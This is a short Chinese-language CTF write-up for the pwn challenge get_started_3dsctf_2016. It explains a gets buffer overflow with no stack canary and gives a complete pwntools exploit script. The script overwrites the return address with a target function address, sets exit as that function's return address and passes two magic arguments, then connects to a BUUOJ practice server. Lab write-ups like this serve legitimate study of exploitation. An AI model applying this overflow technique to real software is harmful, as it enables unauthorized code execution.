get_started_3dsctf_2016

checksec

没有栈保护,应该还是栈溢出

一般是先在main函数查找,看看整体逻辑

找到了get漏洞

注意啊注意!

这里这道题没有缓冲区

这是正常的题,这里有个s

但是这道题!

只有R没有s

这里有一个点,在函数构建的时候,我们返回函数这里是addr,在引用这个函数时,我们要马上接入他的返回函数,这里就是exit,然后再传参,之前的题没有这个因为没有正常结束不会有什么问题

python 复制代码
from pwn import *
ghust = remote("node5.buuoj.cn",26779)
addr= 0x80489A0
exit_addr=0x0804E6A0
a1=814536271
a2=425138641
payload = b'a'*56 +p32(addr)+p32(exit_addr)+p32(a1)+p32(a2)
ghust.sendline(payload)
ghust.interactive()
相关推荐
段帅龙呀1 小时前
Redis构建缓存服务器
服务器·redis·缓存
乌鸦不像写字台2 小时前
【docker部署】在服务器上使用docker
服务器·docker·容器
牧以南歌〆3 小时前
在Ubuntu主机中修改ARM Linux开发板的根文件系统
linux·arm开发·驱动开发·ubuntu
互联网搬砖老肖3 小时前
运维打铁: MongoDB 数据库集群搭建与管理
运维·数据库·mongodb
Antonio9154 小时前
【音视频】HLS简介与服务器搭建
运维·服务器·音视频
夜月yeyue4 小时前
设计模式分析
linux·c++·stm32·单片机·嵌入式硬件
kfepiza4 小时前
Debian的`/etc/network/interfaces`的`allow-hotplug`和`auto`对比讲解 笔记250704
linux·服务器·网络·笔记·debian
无妄-20245 小时前
软件架构升级中的“隐形地雷”:版本选型与依赖链风险
java·服务器·网络·经验分享
艾伦_耶格宇5 小时前
【docker】-1 docker简介
运维·docker·容器
R.X. NLOS5 小时前
VS Code远程开发新方案:使用SFTP扩展解决Remote-SSH连接不稳定问题
运维·服务器·ssh·debug·vs code